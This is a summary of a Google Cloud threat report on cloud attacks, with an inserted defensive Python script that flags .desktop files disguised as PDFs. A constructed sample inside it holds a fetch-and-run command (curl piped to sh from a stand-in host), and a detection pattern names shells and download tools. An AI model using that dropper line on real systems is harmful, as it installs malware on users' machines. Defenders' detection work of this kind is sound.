Google Cloud Reveals Surge in Sophisticated Cloud Threats in H2 2025


Google Cloud has published its Cloud Threat Horizons Report H2 2025, delivering insights into an increasingly complex cyber-threat landscape targeting cloud environments. The report, drawing on analysis from Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting and other security teams, highlights advanced adversarial tactics and provides actionable mitigation guidance for organisations worldwide.

Key Findings: Rising Threat Sophistication and Escalating Risk

  • Credential compromise remains dominant: Weak or absent credentials were responsible for 47.1% of cloud incidents, with misconfigurations accounting for 29.4% and API/UI-based compromises for 11.8%.
  • Backup infrastructure under direct attack: Financially motivated threat actors have escalated tactics, sabotaging backup systems by deleting routines, corrupting data, and manipulating permissions to disrupt recovery and force ransom payouts.
  • MFA bypass through social engineering: Sophisticated social engineering attacks are enabling MFA bypass, including credential and session cookie theft – especially by North Korea‑aligned group UNC4899 (TraderTraitor) targeting crypto‑asset platforms.
  • Malware via trusted cloud services: Attackers increasingly exploit platforms like Google Drive, GitHub, Dropbox, and others to host decoy files (e.g., .desktop files masquerading as innocuous PDFs) that trigger background malware downloads.
  • Persistence and evasion techniques evolve: The report emphasises that threat actors are refining evasion and persistence strategies while compromising recovery chains and supply chain integrity.

Top Recommendations: Strengthen Core Defences and Recovery Posture

Google Cloud security experts call for a defence‑in‑depth strategy centred on:

  1. Robust identity and access management (IAM): Prioritising least‑privilege models, multi‑factor authentication, credential hygiene, and leak detection.
  2. Resilient recovery infrastructure: Implementing isolated recovery environments – like Cloud Isolated Recovery Environments (CIRE) – to protect against backup sabotage and ensure continuity.
  3. Vigilant threat and anomaly detection: Monitoring for decoy file deployment and MFA bypass attempts, particularly via deceptive cloud services.
  4. Supply chain and developer ecosystem integrity: Including validation mechanisms like Verified CRX Upload for Chrome extensions to prevent malicious updates.
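The decoy-file finding above (.desktop launchers posing as PDFs on trusted cloud services) and recommendation 3 (monitoring for decoy file deployment) both come down to the same check on a Linux endpoint: does a desktop entry's displayed identity say "document" while its Exec line says "run a shell"? The script below is an added example for this summary, not code from the Google Cloud report or any of the teams it cites. The viewer allow-list, the interpreter/download-tool pattern, and the two sample entries are assumptions constructed for illustration; the .desktop format details it relies on (the [Desktop Entry] group and the Name, Icon and Exec keys) are the standard freedesktop.org ones.

```python
"""Detect .desktop launchers that pose as PDF documents.

Added example for this summary; not code from the Google Cloud report.
The heuristics and the sample entries are assumptions / constructed data.
"""
import configparser
import re
from dataclasses import dataclass, field
from pathlib import Path

# Programs a legitimate document launcher would plausibly Exec (assumed list; tune per fleet).
DOC_VIEWERS = {"xdg-open", "evince", "okular", "atril", "zathura", "firefox", "chromium"}
# Interpreters and download tools that have no business "opening a PDF".
SUSPICIOUS_EXEC = re.compile(r"\b(sh|bash|zsh|dash|python3?|perl|curl|wget|base64)\b")


@dataclass
class Verdict:
    path: str
    suspicious: bool = False
    reasons: list[str] = field(default_factory=list)


def analyse_desktop_entry(filename: str, content: str) -> Verdict:
    """Return a Verdict for one desktop entry given its file name and text."""
    v = Verdict(path=filename)
    # Signal 1: double extension on the file itself, e.g. invoice.pdf.desktop
    double_ext = bool(re.search(r"\.pdf\.desktop$", filename, re.IGNORECASE))
    if double_ext:
        v.reasons.append("file name uses the double extension .pdf.desktop")

    # .desktop files are INI-like; keys are case-insensitive to configparser, and
    # interpolation is off so field codes such as %U are left alone.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(content)
    except configparser.Error as exc:
        v.reasons.append(f"unparseable desktop entry: {exc}")
        v.suspicious = double_ext
        return v
    if "Desktop Entry" not in parser:
        v.reasons.append("no [Desktop Entry] group")
        v.suspicious = double_ext
        return v

    entry = parser["Desktop Entry"]
    display_name = entry.get("Name", "")
    icon = entry.get("Icon", "")
    exec_line = entry.get("Exec", "")

    # Signal 2: the launcher tells the user it is a PDF (name or icon).
    claims_pdf = display_name.lower().endswith(".pdf") or "pdf" in icon.lower()
    if claims_pdf:
        v.reasons.append(f"presents itself as a PDF (Name={display_name!r}, Icon={icon!r})")

    # Signal 3: Exec is not a document viewer but an interpreter or fetch tool.
    words = exec_line.split()
    program = Path(words[0]).name if words else ""
    bad_exec = program not in DOC_VIEWERS and bool(SUSPICIOUS_EXEC.search(exec_line))
    if bad_exec:
        v.reasons.append(f"Exec runs an interpreter or download tool: {exec_line!r}")

    # Verdict: looks like a document AND behaves like a dropper.
    v.suspicious = (double_ext or claims_pdf) and bad_exec
    return v


def scan_directory(root: str) -> list[Verdict]:
    """Walk a directory (e.g. a synced cloud-drive folder) and return suspicious entries."""
    results = []
    for path in Path(root).rglob("*.desktop"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        verdict = analyse_desktop_entry(path.name, text)
        if verdict.suspicious:
            results.append(verdict)
    return results


# Constructed samples (not real artefacts): a decoy and a normal viewer launcher.
DECOY_ENTRY = """[Desktop Entry]
Type=Application
Name=Q3_Financial_Summary.pdf
Icon=application-pdf
Exec=sh -c "curl -s https://example.invalid/stage | sh"
Terminal=false
"""

BENIGN_ENTRY = """[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
Terminal=false
"""

if __name__ == "__main__":
    samples = (("Q3_Financial_Summary.pdf.desktop", DECOY_ENTRY),
               ("org.gnome.Evince.desktop", BENIGN_ENTRY))
    for name, text in samples:
        v = analyse_desktop_entry(name, text)
        print(name, "SUSPICIOUS" if v.suspicious else "ok", v.reasons)
```

Run it as-is to see the two constructed samples classified, or call `scan_directory("/path/to/synced/share")` over a mounted cloud-drive or download folder. The verdict deliberately requires both a "looks like a document" signal and a "behaves like a dropper" signal, so a plain viewer launcher with a PDF icon is not flagged; the allow-list and the interpreter pattern are the knobs to adjust for a given fleet.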

Context & Strategic Significance

As organisations increasingly rely on cloud-native environments, attackers have upgraded their playbook – targeting not just data but the very safety nets designed to recover from compromise. The report underscores that recovery systems are now primary targets, signalling an urgent need for stronger defensive posture across identity, access, and infrastructure resilience.

About the Report

The Cloud Threat Horizons Report H2 2025 provides timely, intelligence-backed insights to help security leaders and practitioners understand emerging cloud threats and implement proactive countermeasures. Created by Google Cloud’s Office of the CISO in collaboration with GTIG, Mandiant, and internal security teams, the report continues the tradition of delivering strategic cybersecurity guidance across cloud ecosystems.

You can read the full report here.
